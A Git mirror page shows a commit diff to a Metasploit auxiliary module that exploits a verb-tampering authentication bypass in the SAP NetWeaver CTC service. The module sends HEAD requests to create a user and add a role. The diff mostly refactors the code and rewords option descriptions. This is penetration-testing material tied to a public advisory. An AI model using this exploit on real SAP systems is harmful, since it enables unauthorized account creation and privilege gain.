infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

up to date

bug/bundler_fix
jvazquez-r7 2013-05-14 14:48:58 -05:00
parent 07b3355a17
commit 83f1418f28
1 changed files with 26 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb
View File

@ -33,20 +33,23 @@ class Metasploit4 < Msf::Auxiliary
super( super(
'Name' => 'SAP CTC Service Verb Tampering (add user and add role)', 'Name' => 'SAP CTC Service Verb Tampering (add user and add role)',
'Description' => %q{ 'Description' => %q{
This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service. This module exploits an authentication bypass vulnerability in SAP NetWeaver
The service is vulnerable to verb tampering and allows for unauthorised user management. CTC service. The service is vulnerable to verb tampering and allows for unauthorised
SAP Note 1589525, 1624450 / DSECRG-11-041. user management. SAP Note 1589525, 1624450 / DSECRG-11-041.
}, },
'References' => [['URL','http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/']], 'References' =>
[
[ 'URL', 'http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/' ]
],
'Author' => ['nmonkee'], 'Author' => ['nmonkee'],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options([ register_options([
OptString.new('USER', [true, 'Username', nil]), OptString.new('USER', [true, 'Username to create']),
OptString.new('PASS', [true, 'Password', nil]), OptString.new('PASS', [true, 'Password for the new user']),
OptString.new('GROUP', [true, 'Group', nil]) OptString.new('GROUP', [true, 'Group for the new user'])
], self.class) ], self.class)
end end
def run_host(ip) def run_host(ip)
@ -58,22 +61,23 @@ class Metasploit4 < Msf::Auxiliary
def send_request(uri) def send_request(uri)
begin begin
print_status("[SAP] #{rhost}:#{rport} - sending request") vprint_status("#{rhost}:#{rport} - Sending request to the CTC service...")
res = send_request_raw({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => 'HEAD', 'method' => 'HEAD',
'headers' =>{ 'ctype' => 'text/xml; charset=UTF-8',
'Cookie' => 'sap-usercontext=sap-language=EN', 'cookie' => 'sap-usercontext=sap-language=EN'
'Content-Type' => 'text/xml; charset=UTF-8',} })
}, 45)
if res if res
vprint_error("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s) vprint_error("#{rhost}:#{rport} - Error code: " + res.code.to_s)
vprint_error("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s) vprint_error("#{rhost}:#{rport} - Error title: " + res.message.to_s)
vprint_error("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s) vprint_error("#{rhost}:#{rport} - Error message: " + res.body.to_s)
end else
rescue ::Rex::ConnectionError print_good("User successfully added")
print_error("#{rhost}:#{rport} - Unable to connect")
return
end end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Unable to connect")
return
end
end end
end end